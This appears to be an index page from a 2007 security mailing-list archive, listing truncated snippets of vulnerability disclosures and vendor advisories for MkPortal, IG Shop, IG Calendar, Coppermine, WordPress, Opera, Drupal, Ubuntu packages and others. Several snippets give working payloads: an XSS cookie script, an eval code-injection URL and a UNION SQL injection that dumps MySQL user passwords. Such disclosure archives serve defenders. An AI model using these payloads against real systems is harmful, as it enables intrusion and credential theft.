MkPortal Admin XSS

MkPortal Admin XSS Discovered by: Demential Web: http://headburn.altervista.org E-mail: info[at]burnhead[dot]it Mkportal website: http://www.mkportal.it Go to: /mkportal/admin.php?ind=ad_contentsop=contents_new In both fields write: scriptalert(document.cookie)/script and press save. Alert

IG Shop remote code execution

If eval is the answer, then you are asking the wrong question. --Unknowen ig-shop suffers from two eval's that can be controlled by an attacker: http://127.0.0.1/ig_shop/cart.php?action=;phpinfo();// ./cart.php line 692: eval (cart_$action(););

IG Calendar SQL Injection

SQL Injection in ig-Calendar. This works regardless of magic_quotes_gpc! Dumps mysql login information: http://127.0.0.1/ig-calendar/user.php?id=999%20union%20select%201,User,Password,Host,File_priv,0%20from%20mysql.user ./user.php line 52: $query = 'SELECT * FROM users WHERE id='.$id; Should

Uber Uploader 4.2 Arbitrary File Upload Vulnerability

| |Uber Uploader 4.2 Arbitrary File Upload Vulnerability |Gamma Security Team |www.nullak.com |www.gammahack.com |Discovered:Null |Official Site:http://sourceforge.net/projects/uber-uploader |Download

Intranet Open Source Remote Password Disclosure intranet.mdb

# # ARIA-SECURITY TEAM# # Forum: http://aria-security.com # # Discovered by:Aria-Security Team # # #Type:Remote Password Disclosure

Coppermine Photo Gallery = 1.4.10 SQL Injection Exploit

#!/usr/bin/php ?php /** * This file require the PhpSploit class. * If you want to use this class, the latest * version can be downloaded from acid-root.new.fr. **/ require(phpsploitclass.php); if($argc 4) { print \n-;

Re: SAP Security Contact

The contact email address is security sap com. Security issues will then be handled by our Security Response Team in direct communication with the reporter of the issues. Kind regards, Fritz Bauspiess, SAP NetWeaver Product Management Security

[USN-401-1] D-Bus vulnerability

=== Ubuntu Security Notice USN-401-1 January 04, 2007 dbus vulnerability CVE-2006-6107 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06

[USN-400-1] Thunderbird vulnerabilities

=== Ubuntu Security Notice USN-400-1 January 04, 2007 mozilla-thunderbird vulnerabilities CVE-2006-6497, CVE-2006-6498, CVE-2006-6499, CVE-2006-6501, CVE-2006-6502, CVE-2006-6503, CVE-2006-6505

Advisory 02/2007: WordPress Trackback Charset Decoding SQL Injection Vulnerability

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hardened-PHP Project www.hardened-php.net -= Security Advisory =- Advisory: WordPress Trackback Charset Decoding SQL Injection Vulnerability Release Date: 2007/01/05 Last

iDefense Security Advisory 01.05.07: Opera Software Opera Web Browser createSVGTransformFromMatrix Object Typecasting Vulnerability

Opera Software Opera Web Browser createSVGTransformFromMatrix Object Typecasting Vulnerability iDefense Security Advisory 01.05.07 http://labs.idefense.com/intelligence/vulnerabilities/ Jan 05, 2007 I. BACKGROUND Opera is a cross-platform web browser. More information is available at

[DRUPAL-SA-2007-001] Drupal 4.6.11 / 4.7.5 fixes XSS issue

Drupal security advisory DRUPAL-SA-2007-001 Project: Drupal core. Date: 2007-Jan-05.

[DRUPAL-SA-2007-002] Drupal 4.6.11 / 4.7.5 fixes DoS issue

Drupal security advisory DRUPAL-SA-2007-002 Project: Drupal core. Date: 2007-Jan-05.

Flog 1.1.2 Remote Admin Password Disclosure

-=[ADVISORY---]=- FLog 1.1.2 Author: CorryL[EMAIL PROTECTED] -=[---]=- -=[+]

Kolayindir Download (Yenionline) (tr) SqL Injection Vuln.

# BhhGroup.Org Bilgi-Yonetimi.Org.Tr # script name : Kolayindir Download (Yenionline) (tr) # Script Download : http://www.aspindir.com/indir.asp?id=4630 # Risk : High # Found By : ShaFuck31 # Vulnerable file : down.asp # Vulnerable : http://www.victim.com/ScriptPath/down.asp?id=[SqL]

[USN-402-1] Avahi vulnerability

=== Ubuntu Security Notice USN-402-1 January 05, 2007 avahi vulnerability CVE-2006-6870 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06

Advisory 01/2007: WordPress CSRF Protection XSS Vulnerability

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hardened-PHP Project www.hardened-php.net -= Security Advisory =- Advisory: WordPress CSRF Protection XSS Vulnerability Release Date: 2007/01/05 Last Modified: 2007/01/05

Multiple bugs in EditTag

Script: EditTag Version: 1.2 Author: Greg Billock ([EMAIL PROTECTED]) Discoverer: NetJackal (nima_501[4T]yAhoo[D0T]com - nj[4T]hackerz[D0T]ir) I am sorry for my BAD English. Description: 1) Local file injection: An attacker can use edittag.cgi or edittag_mp.cgi (maybe .pl) to inject files (ex.

ZDI-07-001: QUALCOMM Eudora WorldMail Remote Management Heap Overflow Vulnerability

ZDI-07-001: QUALCOMM Eudora WorldMail Remote Management Heap Overflow http://www.zerodayinitiative.com/advisories/ZDI-07-001.html January 5, 2007 -- CVE ID: CVE-2006-6336 -- Affected Vendor: QUALCOMM -- Affected Products: Eudora WorldMail 3.1.x Mail Management Server -- TippingPoint(TM) IPS

iDefense Security Advisory 01.05.07: Opera Software Opera Web Browser JPG Image DHT Marker Heap Corruption Vulnerability

Opera Software Opera Web Browser JPG Image DHT Marker Heap Corruption Vulnerability iDefense Security Advisory 01.05.07 http://labs.idefense.com/intelligence/vulnerabilities/ Jan 05, 2007 I. BACKGROUND Opera is a cross-platform web browser. More information is available at http://www.opera.com/